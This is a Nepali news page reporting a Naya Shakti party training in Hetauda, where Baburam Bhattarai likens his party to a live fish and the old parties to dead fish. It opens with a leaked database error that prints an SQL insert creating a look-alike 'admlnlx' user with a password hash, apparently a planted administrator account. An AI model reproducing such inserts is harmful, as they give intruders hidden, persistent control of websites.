WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVhqUNwTv1ib7bgvd8DgBV1kfmjO7l/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 17:21:39', '', 'admlnlx', 'admlnlx')
हेटौंडा, माघ २७–
नयाँ शक्ति पार्टी नेपालका संयोजक डा.बाबुराम भट्टराईले नयाँ शक्तिलाई जिउँदो माछा र पुराना पार्टीहरुलाई मरेको माछाको संज्ञा दिएका छन् ।
नयाँ शक्ति पार्टी, मकवानपुर जिल्ला प्रशिक्षण विभागको आयोजनामा हेटौंडामा भएको अभिमुखिकरण तथा प्रशिक्षण कार्यक्रममा बोल्दै संयोजक डा.भट्टराईले मरेको माछा बगेको पानीको बहाबसंगै बग्ने र जिउँदो माछा पानीको बहाबको बिपरीत भन्दै पुराना शक्तिहरु अरुले हिडेको सहज बाटो हिंडिरहेकोले उनिहरु मरेको माछा सरह भएको बताए । नयाँ शक्ति अरुले हिडेको भन्दा आफैले बनाएको पानीको बहाब भन्दा बिपरीत शाहसिक बाटो हिंडिरहेकोले नयाँ शक्ति जिउँदो माछा भएको डा. भट्टराईको जिकिर थियो ।
त्यस्तै पार्टीका सह–संयोजक रामचन्द्र झाले के.पी. ओलीले नेपाल भित्र मधेस नदेखेको र सिके राउतले मधेस भित्र नेपाल नदेखेकाले दुबै उस्तै अतिवादी भएको टिप्पणी गरे । कार्यक्रममा पार्टीका प्रदेश नं. ३ का संयोजक गंगा नारायण श्रेष्ठले घर–घरमा नयाँ शक्ति अभियान बारे जानकारी दिएका थिए । प्रदेश नं.३ का प्रशिक्षण विभाग संयोजक हरिराम रिमालले नयाँ शक्तिको दर्शन अग्रपन्थी फ्रन्टिस्ट भएको र नेपाल अहिले चीन÷भारतको तिब्र आर्थिक वृद्धिको साक्षी रहेको भन्दै आर्थिक समृद्धि र भौतिक बिकाशको लागि अहिले जस्तो उर्बर समय कहिलै नआउने बताए ।